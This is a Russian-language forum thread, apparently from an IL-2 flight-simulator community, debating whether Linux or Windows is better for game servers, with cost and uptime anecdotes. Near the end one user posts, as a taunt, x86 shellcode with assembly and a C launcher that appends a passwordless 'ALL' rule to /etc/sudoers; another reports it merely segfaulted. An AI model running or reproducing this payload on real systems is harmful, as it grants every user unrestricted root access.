-
Linux vs Windows (Перенос..)
Цитата:
Сообщение от
winn
Кто подскажет как командер под линуксом запустить? :rtfm:
А зачем парится и изгаляться под Линуксом?
Он же дороже, сложнее в настройках и управлении, менее стабилен, наконец, чем винда.
Сплошные неудобства и большие затраты времени.
Линукс это для пионеров которым нечем заняться или для узких профессионалов, для решения их же узкоспециализированных задач.
-
Ответ: Re: Сервер Ил-2 под Linux
Цитата:
Сообщение от
tovarisch_Ko
Он же дороже, сложнее в настройках и управлении, менее стабилен, наконец, чем винда.
Линукс это для пионеров которым нечем заняться или для узких профессионалов, для решения их же узкоспециализированных задач.
Ко, дорогой, когда 11 регионов РФ опутаны только одним провайдером, с дикими ценами на внешний инет, и руководство этого провайдера устанавливает правила "только под линукс", то некуда деватся... там тоже летают товарищи с "нуля". Два года бился по установке сервера под винду и т.д.... у очень многих нет вообще возможности по анлиму или "внешке" выходить. тут или "бросить ил" или "париться".
-
Цитата:
Сообщение от
tovarisch_Ko
Юмор?
-
Цитата:
Сообщение от
Waso
Юмор?
Видимо, товарищ не знает что такой бить баклуши при аптайме от пары лет и выше...:)
-
Цитата:
Сообщение от
DnK
Ко, дорогой, когда 11 регионов РФ опутаны только одним провайдером, с дикими ценами на внешний инет, и руководство этого провайдера устанавливает правила "только под линукс", то некуда деватся... там тоже летают товарищи с "нуля". Два года бился по установке сервера под винду и т.д.... у очень многих нет вообще возможности по анлиму или "внешке" выходить. тут или "бросить ил" или "париться".
Да понятно, что NIX-специалистам надо как-то поддерживать свою нужность и оправданность эксклюзивных зар...положения.
А зачем биться по установке на сервер винды, не проще поставить собственный сервер как железку и ни у кого тогда не спрашивать ни советов, ни разрешений - что ставить на эту собственную железку?
Нынче вон родные интеловские "легкие" 1U cервера совсем не дороги, как, хотя бы они же, 3-4 года назад, да еще и монитор никакой не нужен...
Или у провайдера действительно так жестко, что он и клиентов со своим железом ограничивает, что им там и как на нем делать?
Добавлено через 2 минуты
Цитата:
Сообщение от
Waso
Юмор?
Вовсе нет. Просто не нужно "прикручивать" то, что предназначено для решения совсем других задач, к задачам для которых вполне годятся более простые и дешевые решения.
-
Цитата:
Сообщение от
DogEater
Видимо, товарищ не знает что такой бить баклуши при аптайме от пары лет и выше...:)
Почему не знаю, очень даже до 2004 года дома сидел на диалапе, междугороднем, потому как на краю города и ни один провайдер не желал тянуть провода ради 3-4-5 клиентов, всего-то через 3 дома.
Теперь есть АДСЛ, то же ждал 1,5 год, пока "оборудование установят на АТС" и пошли они воздушники... кабель зарытый в земле и сертифицированное оборудование лучше, чем сидеть летом в грозы по 2-3 недели без связи.
Добавлено через 3 минуты
Цитата:
Сообщение от
basurman
это смотря где. У нас хостинг берет на 10 евронов больше за винду, чем за линух.
Это за собственный сервер клиента или все же за предоставленные самим провайдером сервер?
Надеюсь мы об одном говорим - о коллокейшн?
А софт нулевый переносится на Линукс без проблем, т.к. и Питон, и Firebird SQL существут NIXовые.
-
Linux vs Windows (Перенос..)
Цитата:
Сообщение от
SilverFox
Всетаки он не знает :)
Про монополиста, дикие цены и что народу нужен хотя бы внутренний сервер?
И все равно это не отменят, что своя железка с виндой проще и дешевле, или тут тоже все так плохо с монополистом?
-
Цитата:
Сообщение от
tovarisch_Ko
Коли не юмор, то раскажите тогда чем линукс дороже, чем сложнее и особенно менее стабилен? А то голословность сплошная выходит.
Цитата:
Сообщение от
tovarisch_Ko
А Win2003 предназначена для общего пользования? Гы...смешно :)
Не надо в одну кучку складывать десктопы и серверы, тут разговор о серверах идет..."как бе".
Кстати, был случай, одной тетке, буху, поставили какую-то кубунту на рабочую машину, сказали что это новая винда и она до сих пор всем довольна. Эску она все-равно по RDP брала.
Добавлено через 1 минуту
Цитата:
Сообщение от
tovarisch_Ko
И все равно это не отменят, что своя железка с виндой проще и дешевле, или тут тоже все так плохо с монополистом?
Это с чего своя железка с виндой стала дешевле? Али вы просто не знаете, что продукт от фирмы Майкрософт стоит денег? :D
Или может быть вы наивно полагаете, что любой провайдер вам даст припереть какой-нибудь свой мидл-тауэр собранный из подручных материалов и сунуть его "тут рядышком в уголке"?
P.S. Holy war я разводить нисколько не собираюсь...ибо глупое занятие
-
Цитата:
Сообщение от
tovarisch_Ko
Нет - про это :
Цитата:
Видимо, товарищ не знает что такой бить баклуши при аптайме от пары лет и выше...
У меня серваки пока новые , столько не наработали, но старые и поболее 2 лет работали без перезагрузки. То есть настроил поставил и бей баклуши :)
[sfox@main ~]$ top
top - 12:21:17 up 201 days,
А вот бухсерверу на 2003 MS стока наработать никак не получается :)
-
Цитата:
Сообщение от
Waso
Коли не юмор, то раскажите тогда чем линукс дороже, чем сложнее и особенно менее стабилен? А то голословность сплошная выходит.
Тем дороже и сложнее, что специалисты для него дороже в разы и реже к тому же значительно, пионеры, которые изучают продукт в процессе установки и эксплуатации никому нафиг не нужны.
Или вы думаете, что вся стоимость системы определяется только стоимостью дистрибутива и железа? Наверняка ведь знаете про понятие "стоимость владения"?
А стабильность вообще понятие слабоопределяемое, хотя бы в силу применимости продукта, вот у меня Линукс абсолютно не стабилен, потому как попросту не применим.
Цитата:
Сообщение от
Waso
А Win2003 предназначена для общего пользования? Гы...смешно :)
Не надо в одну кучку складывать десктопы и серверы, тут разговор о серверах идет..."как бе".
А интересно, для чего еще по вашему? :)
Про десктопы и речи нет.
Цитата:
Сообщение от
Waso
Это с чего своя железка с виндой стала дешевле?
Потому что один раз заплатил за неё и далее провайдеру только за размещение и трафик.
Цитата:
Сообщение от
Waso
Али вы просто не знаете, что продукт от фирмы Майкрософт стоит денег? :D
Разумеется стоит денег, при чем не намного дороже такого же коробочного NIX дистрибутива с нормальной подпиской-поддержкой.
Цитата:
Сообщение от
Waso
Или может быть вы наивно полагаете, что любой провайдер вам даст припереть какой-нибудь свой мидл-тауэр собранный из подручных материалов и сунуть его "тут рядышком в уголке"?
Провайдер который пускает к себе с мидл-тауэрами и не провайдер вовсе, так железо-помойка, тут даже рассматривать нечего.
Добавлено через 13 минут
Цитата:
Сообщение от
SilverFox
Нет - про это :
У меня серваки пока новые , столько не наработали, но старые и поболее 2 лет работали без перезагрузки. То есть настроил поставил и бей баклуши :)
А меня не новые, уже 6 лет под 2000 виндой и MS SQL работают, так же все в порядке, только пылесосить иногда надо, потому как стоят просто в оффисе.
-
Цитата:
Сообщение от
tovarisch_Ko
А меня не новые, уже 6 лет под 2000 виндой и MS SQL работают, так же все в порядке, только пылесосить иногда надо, потому как стоят просто в оффисе.
Все одно не не понимаешь нас что ли ?
Приведи время работы без перезагрузки твоих компов - up time.
-
Цитата:
Сообщение от
SilverFox
Все одно не не понимаешь нас что ли ?
Приведи время работы без перезагрузки твоих компов - up time.
Все 6 лет. Выключаются раз в год для профилактики железа (пылесос).
Сервер Нуля без перезагрузки работал с момента запуска до мая прошлого года, когда переставили систему ради некоторых новых фич, при чем через 4 месяца после запуска пережил смену платформы (железа) без переустановки софта.
Это спор бессмысленный. Винда уже давно ни чем не хуже Линукса, в плане стабильности, что собственно доказывается её куда большей распространённостью, а серверная вообще никогда не была хуже. В плане же удобства администрирования Линукс всегда уступал.
-
Цитата:
Сообщение от
tovarisch_Ko
Тем дороже и сложнее, что специалисты для него дороже в разы и реже к тому же значительно, пионеры, которые изучают продукт в процессе установки и эксплуатации никому нафиг не нужны.
Или вы думаете, что вся стоимость системы определяется только стоимостью дистрибутива и железа? Наверняка ведь знаете про понятие "стоимость владения"?
А стабильность вообще понятие слабоопределяемое, хотя бы в силу применимости продукта, вот у меня Линукс абсолютно не стабилен, потому как попросту не применим.
А я по наивности думал, что любые специалисты стоят дорого. А оказывается спецы винды дешевле...каковы спецы, такова и цена.
А для меня стабильность это в первую очередь стабильность работы.
Опять же есть пример. У меня Иловский сервер крутится под 2k3, на которую у меня только гостевой вход. Машина вполне себе на правильном железе, вполне себе работает не в экстремальных режимах, и в присутствии хозяина ведет себя вполне адектватно. Но вот стоило ему уехать на длительные каникулы и машина через три недели сама по себе стала виснуть раз в сутки. Просто тупо уходит со связи и все тут. Теперь вот ждём возвращения хозяина как маны небесной. Вот такие вещи я вкладываю в понятие стабильности.
Цитата:
Сообщение от
tovarisch_Ko
А интересно, для чего еще по вашему? :)
Для общего пользования существуют десктопные операционки. Хотя если вам нравится забивать гвозди микроскопом...
Цитата:
Сообщение от
tovarisch_Ko
Потому что один раз заплатил за неё и далее провайдеру только за размещение и трафик.
А в случае линукса надо за что-то платить дополнительно? :eek:
Кстати!, сама по себе винда полный ноль...просто окна без всего. Так что к стоимости операционки прибавляйте стоимости расширения функциональности и сервисов. А это уже сумма. Кстати, для чего нульваровский сервер использует бесплатные и совсем неродные для M$ пайтон, зопу и файрберд, если мог с огромным для себя преимуществом работать под IIS и быть написаным на си-шарпе с базой в MS SQL? :) Тем более это должно было уменьшить "стоимость владения".
P.S. А если в общем, то моё мнение всегда было и будет оставаться следующим - выбирать инструмент нужно прежде всего исходя из задачи. Про микроскоп я уже написал.
-
Цитата:
Сообщение от
Waso
А я по наивности думал, что любые специалисты стоят дорого. А оказывается спецы винды дешевле...каковы спецы, такова и цена.
Возможно, но скорее всего конкуренция, специалистов под винду больше и она проще, отсюда зарплата ниже. Вы бы еще Оракловцев или Цисковцев вспомнили.
Цитата:
Сообщение от
Waso
Как будьто есть другое понятие.
У меня вот тоже есть знакомый построивший сервер под серьезный проект все железо правильное - платформа не левая интеловская, всякие там 4-х ядерники, много правильной памяти, рэйды и пр. террабайты, и теперь жалуется на сбои, под Линуксом как раз => Линукс не стабилен нифига :)
Цитата:
Сообщение от
Waso
Кстати!, сама по себе винда полный ноль...просто окна без всего. Так что к стоимости операционки прибавляйте стоимости расширения функциональности и сервисов. А это уже сумма.
Это про любую операционку можно сказать - они для того и существует, чтобы застваить груду железа выполнять полезные функции.
А уж какие, это определяется надстройками.
Цитата:
Сообщение от
Waso
Кстати, для чего нульваровский сервер использует бесплатные и совсем неродные для M$ пайтон, зопу и файрберд, если мог с огромным для себя преимуществом работать под IIS и быть написаным на си-шарпе с базой в MS SQL? :) Тем более это должно было уменьшить "стоимость владения".
А кто будет платить за переход от Файрберда на MSSQL или перекодировать с Пайтона на C#? И почему они собственно не родные?
Никаких виртуальных машин и т.п. для них запускать не надо ведь.
Цитата:
Сообщение от
Waso
P.S. А если в общем, то моё мнение всегда было и будет оставаться следующим - выбирать инструмент нужно прежде всего исходя из задачи. Про микроскоп я уже написал.
Вот именно, к чему и пришли, раз Ил изначально сделали под винду, то нефиг и изгаляться.
-
Цитата:
Сообщение от
tovarisch_Ko
Возможно, но скорее всего конкуренция, специалистов под винду больше и она проще, отсюда зарплата ниже. Вы бы еще Оракловцев или Цисковцев вспомнили.
А чего их вспоминать. Не считаю себя крутым цискарём, но хлеб приходится зарабатывать то циски перетряхивая, то линуха перелопачивая.
Я почему винду недолюбливаю...она суть "чёрный ящик". Что происходит внутри можно только гадать и при этом ни разу не попасть в правильный ответ :)
Цитата:
Сообщение от
tovarisch_Ko
У меня вот тоже есть знакомый построивший сервер под серьезный проект все железо правильное - платформа не левая интеловская, всякие там 4-х ядерники, много правильной памяти, рэйды и пр. террабайты, и теперь жалуется на сбои, под Линуксом как раз => Линукс не стабилен нифига :)
Странно это...весьма
Цитата:
Сообщение от
tovarisch_Ko
А кто будет платить за переход от Файрберда на MSSQL или перекодировать с Пайтона на C#? И почему они собственно не родные?
Никаких виртуальных машин и т.п. для них запускать не надо ведь.
Они родом фром *nix, все до единого. Ну разве что файрбёрд странный перебежчик-оборотень из винды :)
P.S. Ладно, хорош офтопить. Это конечно интересно, только толку ноль. Кстати, а вы для чего в эту тему вообще зашли? :)
-
Цитата:
Сообщение от
Waso
Они родом фром *nix, все до единого. Ну разве что файрбёрд странный перебежчик-оборотень из винды
С чего это вдруг? То что они свободно распространяемые и их сначала реализовали под NIХы ещё ничего не значит.
Цитата:
Сообщение от
Waso
Странно это...весьма
Ничего странного. Проблемы с софтом, т.к. с железом их нет, и дело не в стабильности Линукса как платформы, и не кривые руки там у кого надо, но...
Цитата:
Сообщение от
Waso
P.S. Ладно, хорош офтопить. Это конечно интересно, только толку ноль. Кстати, а вы для чего в эту тему вообще зашли? :)
Любопытства ради - чего это народ придумывает себе сложности, а потом мужественно их преодолевает.
Ничего против Линукса и пр. NIXов не имею, как и против их приверженцев, просто хотел узнать, зачем конкретно в этом случае...
-
Ответ: Linux vs Windows (Перенос..)
У меня FTP сервер + технический форум стоит под 2003 и вопросов нет, работает как часики, а вот сервер, что под пингвином порядком всем уже надоел, сборку ту, что работает, собирали несколько человек, а фактически один. Так вот, когда пингвин падает, все только разводят руками и смотрят в рот системному администратору, и в чём плюс, в том, что человек молится на пингвина ? Вот вам и царь и Бог в одном лице, да и вообще, что теперь на одного человека молится ? Где унифицированность ?
Лично для себя я сделал вывод, всё что нужно для серверной части, так это стабильность и понимание тех, кто эту систему обслуживает. Как сказал один товарищ, который в совершенстве работает в сервеной части винди и люнекса, Не ставьте люникс - это сборище глюков и он достаточно неповоротлив..........
-
Спор стар как мир. Похоже здесь образовался филиал ЛОР или опеннета.
Вы(виндузятники и линуксоиды) ещё БСДшников задирать начните для абсолютного счастья. :umora:
-
Цитата:
Сообщение от
DogEater
Спор стар как мир. Похоже здесь образовался филиал ЛОР или опеннета.
Вы(виндузятники и линуксоиды) ещё БСДшников задирать начните для абсолютного счастья. :umora:
Спор возник на вопросе - зачем ставить Линукс, там где необходимости в нем нет?
И тему сразу увели в сторону спора что лучше.
NIXы не хуже и не лучше винды, всему свое применение, в примении их к Ил-2 есть большое сомнение, развеять которое ни как не получается.
Что лучше или хуже, все зависит от точки зрения, естественно каждый профессионал будет доказывать свою нужность, но есть еще и точка зрения пользователя-потребителя-заказчика, т.е. тогокто будет работать и того кто будет поддерживать.
Добавлено через 5 минут
Цитата:
Сообщение от
Waso
Я почему винду недолюбливаю...она суть "чёрный ящик". Что происходит внутри можно только гадать и при этом ни разу не попасть в правильный ответ :)
То же самое можно сказать про Линукс, если ты не являешься его разработчиком-кодировщиком, а пользователи, да и админы таковыми обычно :) не являются.
Да, в Линукс "ящички" поменьше, зато их побольше, и что на самом деле лучше - еще можно поспорить.
А проблемы, у разработчиков, и там и там одинаковые, и решаются они одинаково, потому как Линукс уже давно разрабатывается на тех же принципах, что и винда, у них только принцип распространения и поддержки отличается, что не в пользу Линукс, сейчас.
-
Глубокая мастурбация с wine ИМО не стоит того. Надёжнее не станет.
То, что отсутствует версия сервера Ила под linux/bsd - печально - но это факт.
собственно всё.
-
Цитата:
Сообщение от
=SF=Andre
...
Лично для себя я сделал вывод, всё что нужно для серверной части, так это стабильность и понимание тех, кто эту систему обслуживает. Как сказал один товарищ, который в совершенстве работает в сервеной части винди и люнекса, Не ставьте люникс - это сборище глюков и он достаточно неповоротлив..........
Все правильно, Линукс сейчас это "пальцы", единственная необходимость в нем - чтобы Микрософт не заснул.
Добавлено через 1 минуту
Цитата:
Сообщение от
DogEater
Глубокая мастурбация с wine ИМО не стоит того. Надёжнее не станет.
То, что отсутствует версия сервера Ила под linux/bsd - печально - но это факт.
собственно всё.
И не будет никогда - спрос и так не велик и тратить усилия никто не будет, да и смысла нет - все равно игровая платформа виндовая, а не NIXовая, скорее под игроприставки напишут, что собственно уже и делается.
-
Цитата:
Сообщение от
=SF=Andre
... Как сказал один товарищ, который в совершенстве работает в сервеной части винди и люнекса, Не ставьте люникс - это сборище глюков и он достаточно неповоротлив..........
А мужики то не знают, у которых QNX стоит...
Им надо срочно на винду переходить...
-
Цитата:
Сообщение от
Waso
вы еще верите в линух? тогда мы летим к вам!
Author: Rick
Email: rick2600@hotmail.com
Description: Anyone can run sudo without password
section .text
global _start
_start:
;open("/etc/sudoers", O_WRONLY | O_APPEND);
xor eax, eax
push eax
push 0x7372656f
push 0x6475732f
push 0x6374652f
mov ebx, esp
mov cx, 0x401
mov al, 0x05
int 0x80
mov ebx, eax
;write(fd, ALL ALL=(ALL) NOPASSWD: ALL\n, len);
xor eax, eax
push eax
push 0x0a4c4c41
push 0x203a4457
push 0x53534150
push 0x4f4e2029
push 0x4c4c4128
push 0x3d4c4c41
push 0x204c4c41
mov ecx, esp
mov dl, 0x1c
mov al, 0x04
int 0x80
;close(file)
mov al, 0x06
int 0x80
;exit(0);
xor ebx, ebx
mov al, 0x01
int 0x80
*/
#include <stdio.h>
#include <string.h>
char code[] =
"\x31\xc0\x50\x68\x6f\x65\x72\x73\x68\x2f\x73\x75\x64"
"\x68\x2f\x65\x74\x63\x89\xe3\x66\xb9\x01\x04\xb0\x05"
"\xcd\x80\x89\xc3\x31\xc0\x50\x68\x41\x4c\x4c\x0a\x68"
"\x57\x44\x3a\x20\x68\x50\x41\x53\x53\x68\x29\x20\x4e"
"\x4f\x68\x28\x41\x4c\x4c\x68\x41\x4c\x4c\x3d\x68\x41"
"\x4c\x4c\x20\x89\xe1\xb2\x1c\xb0\x04\xcd\x80\xb0\x06"
"\xcd\x80\x31\xdb\xb0\x01\xcd\x80";
void main(void) {
void (*shellcode)() = code;
shellcode();
}
-
Да уж, смешной спор...
а мужики в всяких яндексах, гуглах и т.п. и не знают, что оказывается винда то надежнее :D и наверно по своей природной глупости ставят на тысячи серверов линукс или FreeBSD. и эти сервера работают годами под нехилыми нагрузками.
Добавлено через 12 минут
Цитата:
Сообщение от
Youss
вы еще верите в линух? тогда мы летим к вам!
...SKIP...
а сами проверяли?
проверил на 3х дистрибутивах, ни на одном это ни к чему не привело, кроме сегфолта ;) (попытка доступа в чужую память)
-
Цитата:
Сообщение от
RR_Vespertinus
проверил на 3х дистрибутивах, ни на одном это ни к чему не привело, кроме сегфолта ;) (попытка доступа в чужую память)
Значит это неправильные дистрибутивы :rtfm:
:)